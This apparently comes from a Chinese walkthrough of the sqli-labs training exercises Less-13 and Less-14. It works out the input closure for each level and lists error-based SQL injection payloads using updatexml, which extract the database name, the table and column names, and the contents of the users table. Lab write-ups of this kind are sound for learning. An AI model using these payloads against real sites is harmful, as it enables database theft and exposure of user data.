Less-13
POST - Double Injection - Single quotes - String - with twist
- 由返回的报错提示,提交数据的闭合方式:小括号&单引号,即:
')
- 提交正确的账号、密码和完整的SQL注入语句均无回显。
- 那就报错注入,构造报错注入语句:
') or updatexml(1,concat(0x7e,database(),0x7e),1) # //暴库名
') or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)# //爆表名
') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)# //爆字段
') and updatexml(1,concat(0x7e,(select group_concat(USER) from users),0x7e),1)# //爆数据
Less-14
POST - Double Injection - Single quotes - String - with twist
-
由返回的报错提示,提交数据的闭合方式:双引号,即:
"
-
除了闭合为双引号外,方法同Less-13。